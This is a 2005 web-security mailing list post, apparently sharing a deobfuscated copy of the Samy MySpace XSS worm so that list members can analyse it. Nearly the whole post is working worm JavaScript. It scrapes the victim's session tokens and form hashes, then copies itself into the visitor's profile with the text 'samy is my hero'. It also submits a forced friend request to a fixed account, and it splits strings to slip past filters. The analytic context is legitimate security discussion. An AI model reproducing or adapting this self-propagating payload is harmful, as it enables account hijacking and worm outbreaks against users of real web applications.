WebApp Sec mailing list archives
Re: myspace hack (readable javascript code )
From: "A. Fontes" <saphyr () infomaniak ch>
Date: Fri, 14 Oct 2005 18:17:17 +0200
If someone needs to analyse the code, here's a readable form...... Antonio ============================================= // get quotes string var B=String.fromCharCode(34); var A=String.fromCharCode(39); function g() { var C; try { var D=document.body.createTextRange(); C=D.htmlText } catch(e) { }if(C) { return C
} else { return eval('document.body.inne'+'rHTML') } } function getData(AU) { M=getFromURL(AU,'friendID'); L=getFromURL(AU,'Mytoken') } function getQueryParams() { var E=document.location.search; var F=E.substring(1,E.length).split('&'); var AS=new Array(); for(var O=0;O<F.length;O++) { var I=F[O].split('='); AS[I[0]]=I[1] } return AS } var J; var AS=getQueryParams(); var L=AS['Mytoken']; var M=AS['friendID']; if(location.hostname=='profile.myspace.com') { document.location='http://www.myspace.com'+location.pathname+location.search } else { if(!M) { getData(g()) } main() } function getClientFID() { return findIn(g(),'up_launchIC( '+A,A) } function nothing() { } function paramsToString(AV) { var N=new String(); var O=0; for(var P in AV) { if(O>0) { N+='&' } var Q=escape(AV[P]);while(Q.indexOf('+')!=-1)
{ Q=Q.replace('+','%2B') }while(Q.indexOf('&')!=-1)
{ Q=Q.replace('&','%26') } N+=P+'='+Q; O++ } return N } function httpSend(BH,BI,BJ,BK) { if(!J) { return false } eval('J.onr'+'eadystatechange=BI'); J.open(BJ,BH,true); if(BJ=='POST') { J.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); J.setRequestHeader('Content-Length',BK.length) } J.send(BK); return true } function findIn(BF,BB,BC) { var R=BF.indexOf(BB)+BB.length; var S=BF.substring(R,R+1024); return S.substring(0,S.indexOf(BC)) } function getHiddenParameter(BF,BG) { return findIn(BF,'name='+B+BG+B+' value='+B,B) } function getFromURL(BF,BG) { var T; if(BG=='Mytoken') { T=B } else { T='&' } var U=BG+'='; var V=BF.indexOf(U)+U.length; var W=BF.substring(V,V+1024); var X=W.indexOf(T); var Y=W.substring(0,X); return Y } function getXMLObj() { var Z=false; if(window.XMLHttpRequest) { try { Z=new XMLHttpRequest() } catch(e) { Z=false } } else if(window.ActiveXObject) { try { Z=new ActiveXObject('Msxml2.XMLHTTP') } catch(e) { try { Z=new ActiveXObject('Microsoft.XMLHTTP') } catch(e) { Z=false } } } return Z } var AA=g(); var AB=AA.indexOf('m'+'ycode'); var AC=AA.substring(AB,AB+4096); var AD=AC.indexOf('D'+'IV'); var AE=AC.substring(0,AD); var AF; if(AE) { AE=AE.replace('jav'+'a',A+'jav'+'a'); AE=AE.replace('exp'+'r)','exp'+'r)'+A); AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>' } var AG; function getHome() { if(J.readyState!=4) { return } var AU=J.responseText; AG=findIn(AU,'P'+'rofileHeroes','</td>'); AG=AG.substring(61,AG.length); if(AG.indexOf('samy')==-1) { if(AF) { AG+=AF; var AR=getFromURL(AU,'Mytoken'); var AS=new Array(); AS['interestLabel']='heroes'; AS['submit']='Preview'; AS['interest']=AG; J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
} } } function postHero() { if(J.readyState!=4) { return } var AU=J.responseText; var AR=getFromURL(AU,'Mytoken'); var AS=new Array(); AS['interestLabel']='heroes'; AS['submit']='Submit'; AS['interest']=AG; AS['hash']=getHiddenParameter(AU,'hash'); httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS)) } function main() { var AN=getClientFID(); var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L; J=getXMLObj(); httpSend(BH,getHome,'GET'); xmlhttp2=getXMLObj(); httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET') } function processxForm() { if(xmlhttp2.readyState!=4) { return } var AU=xmlhttp2.responseText; var AQ=getHiddenParameter(AU,'hashcode'); var AR=getFromURL(AU,'Mytoken'); var AS=new Array(); AS['hashcode']=AQ; AS['friendID']='11851658'; AS['submit']='Add to Friends'; httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS)) } function httpSend2(BH,BI,BJ,BK) { if(!xmlhttp2) { return false } eval('xmlhttp2.onr'+'eadystatechange=BI'); xmlhttp2.open(BJ,BH,true); if(BJ=='POST') { xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xmlhttp2.setRequestHeader('Content-Length',BK.length) } xmlhttp2.send(BK); return true }
Current thread:
- Re: myspace hack, (continued)
- Re: myspace hack Stephen de Vries (Oct 14)
- Re: myspace hack Tim Brown (Oct 14)
- Re: myspace hack bugtraq (Oct 14)
- Re: myspace hack Tom Gallagher (Oct 14)
- Re: myspace hack Disco Jonny (Oct 14)
- RE: myspace hack Jeff Robertson (Oct 14)
- RE: myspace hack Richard M. Smith (Oct 14)
- RE: myspace hack Reynolds, Jake (Oct 14)
- RE: myspace hack Jeff Robertson (Oct 14)
- Re: myspace hack bugtraq (Oct 14)
- Re: myspace hack (readable javascript code ) A. Fontes (Oct 14)
- Re: myspace hack (History of XSS) Jeremiah Grossman (Oct 14)
- RE: myspace hack Evans, Arian (Oct 14)